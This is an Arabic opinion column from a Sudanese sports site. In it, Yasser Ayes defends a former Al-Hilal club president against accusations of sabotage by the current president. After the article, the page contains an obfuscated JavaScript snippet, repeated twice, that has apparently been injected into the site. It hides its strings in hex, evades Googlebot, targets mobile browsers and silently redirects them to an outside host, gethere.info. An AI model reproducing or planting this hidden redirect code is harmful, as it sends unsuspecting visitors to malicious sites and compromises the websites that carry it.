الرئيسية / مقالات / ياسر عائيس يكتب بعنوان غضبة الحكيم !!

ياسر عائيس يكتب بعنوان غضبة الحكيم !!

%d9%8a%d8%a7%d8%b3%d8%b1وهج الحروف ياسر عائس نفث الحكيم الهواء الساخن وأطلق زفرات حرى من صدره المشحون بالظلم والوجع..خرج على الاعلام وهو نادر الظهور قليل السفور شحيح الكلام كثير الفعل شديد العزم كثير الرماد تجاه الهلال. أسفر بوجه غير وأطل بلغة مختلفة لما بلغ السيل الزبى وفاض الكيل بل طفح وبعد أن مزق رئيس الهلال موازين الكلام وهتك لغة الأدب وموروثات النادي وتجرأ بلا وازع من تذكار وإتهم رئيس الهلال الأسبق بما ليس فيه ولا من أخلاقه ولا شيمه . لم يعتد الحكيم على الرد لكنه كان مجبرا على الخروج والدفاع عن نفسه بعد أن قدم كتابه بيمينه من قبل وتشفع له سيرة ناصعة بعيدة عن لغة المحاور والتكتلات والمعارضة الضارة. المعارضة حق لو كان البعض يعرف أبجديات الديمقراطية وهى الساق الثانية للممارسة التي يتعاطاها البعض جهرا ويرفضها سرا، ويفترض أن كل صوت ناقم ورأي ناقد إنما هو محاولة لتفكيك المجلس ونسف الوجود وهو زعم فطير يدل على قلة التجارب مثلما يدل السير على المسير والبعرة على البعير. ليس في عرف الهلال ولا الحكيم معارضة هدامة تتخذ الفتن والتخريب والتآمر منهجا للاختلاف في الرأي ولا مسلكا للتعبير عن إختلاف وجهات النظر. ولم نعرف عن الحكيم في تاريخه الناصع الممتد أية محاولات لعرقلة مسيرة الهلال أو مجرد تمني خسارته لأنه من حمله على أكتافه ثلاثين عاما أو تزيد ويحنو عليه حنو المرضعات على الفطيم لا يمكنه أن يجرح مسيرته بكلمة ناهيك عن مفردة التآمر الكبيرة وفرية التخريب التي يكذبها الواقع. وتدعم الشواهد وتسجل الوقائع دعم الحكيم لمجالس الهلال المتعاقبة وقد كنت شاهدا على انقاذه رحلة الهلال إلى تونس لمواجهة الترجي في أصعب فترات الخلاف بينه ومجلس النبلاء. تعامل الحكيم بأصله وهلاليته الطاغية وقلبه الذي ينبض بحب الكيان وقدم المال والرأي والمشوره وسدد تذاكر البعثه عندما إحتار المجلس!. سهام الكاردينال سترتد إلى نحره لأنه إعترف على رؤوس الأشهاد بأن الحكيم كان الداعم الأول والأوحد وقد نصره عندما خذلته الحكومة والأقطاب!. كيف لمن بذل المال في صمت وتكتم على الإعلان، ومن عمل الخير في السر أن يسعى في العلن لهدم ما بناه وكما تقول القاعدة فإن من سعى لنقض ما بنى بيديه فسعيه مردود عليه. هل يظن أحد عاقل أن الحكيم الذي سارع لتسليم مساهمته في بناء الهلال باليورو يعمل على ازكاء الفتن وحمل معول الهدم وقيادة التخريب. لن تنطلي مثل هذه الخزعبلات على عقل طفل غرير، فكيف يتوقع أن يتعاطى معها شعب الهلال العاقل والقادر على التمييز بين أهل وجعته ومن يسعون لهدمه وإعمال سياسة فرق تسد. من يزرع الفتن لا يسعى لقبض الثمن بل يفترض أن يخصص الدعم لهزيمة الهلال وليس لإسناد الكاردينال. ليس من أخلاق الحكيم إستخدام الوسائل القذرة ولا الأساليب المشبوهة الملتوية لهزيمة مخالفيه ولا من أدبه ولا أدب الهلال عرقله جهود الأهلة ولا قطع الطريق على الادارات، ولو كان يفعل لما نازعه أحد في الرئاسة لأنه وبما حباه الله من سعة في العلم وبسطة في الرزق وحب على الشيوع إحتل به قلوب الاهلة وثقة الناخبين لكان قادرا على الاستمرار في رئاسة النادي لاطول الفترات. ترجل من مقعده ونزل من راحلته واختار التوقيت المناسب بنفسه لهجر العمل التنفيذي المباشر لكنه لم يستقل من حب الهلال فالعاشق لا يستقيل ولا حرمه من فيض عطاياه ولا سحائب احسانه. كان تماما مثل سحابة هارون الرشيد يأتي خراجه إلى الهلال دون التقيد بمنصب أو مكانة أو رئاسة أو غيرها كالغيث أينما وقع نفع. ولو كان بالهلال خنساء لنظمت في إبتعاده أبياتا من الشعر ومجلدات من المدح والتقريظ ولكنه زمن الجحود والتنكر والإفتتان بكل ما هو جديد. نحسب أن مجرد التفكير ولو بالخاطر في إتهام الحكيم بالعمل على الفتن وتخريب وعرقلة جهود الهلال يعد طعنا في شرف الهلال نفسه وفي أخلاقه وموروثاته التي ظلت مثالا يحتذى ،وقد كان الحكيم ركنا ركينا منها وقدوة تقتدى. شهادتي مجروحة في حق رئيس الهلال الأسبق الذي نال لقبا مفصلا عليه بما تميز به من حكمة ووقار ومن إيثار وترفع ومن طائية لا تضاهى وكرم لا يدرك وحاتميه تفتقد المقارنة والمثال. تقول القاعدة الذهبية: إتقوا غضبة الحليم…فصاحب الصدر الواسع والحلم والتواضع والتجاوز والصفح والتسامح يجب أن لا نستفزه. وهاهى غضبة الحكيم تزمجر بعد أن بلغ التعدي سدرة المنتهى. ليس من أدب الهلال التجني والإسفاف بحق الكبار..ولكن كل من قفز بلا تدرج على الرئاسة بات خطرا على الهلال نفسه!!. }var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

التعليق بواسطة فيس بوك

اضف رد

لن يتم نشر البريد الإلكتروني . الحقول المطلوبة مشار لها بـ *

*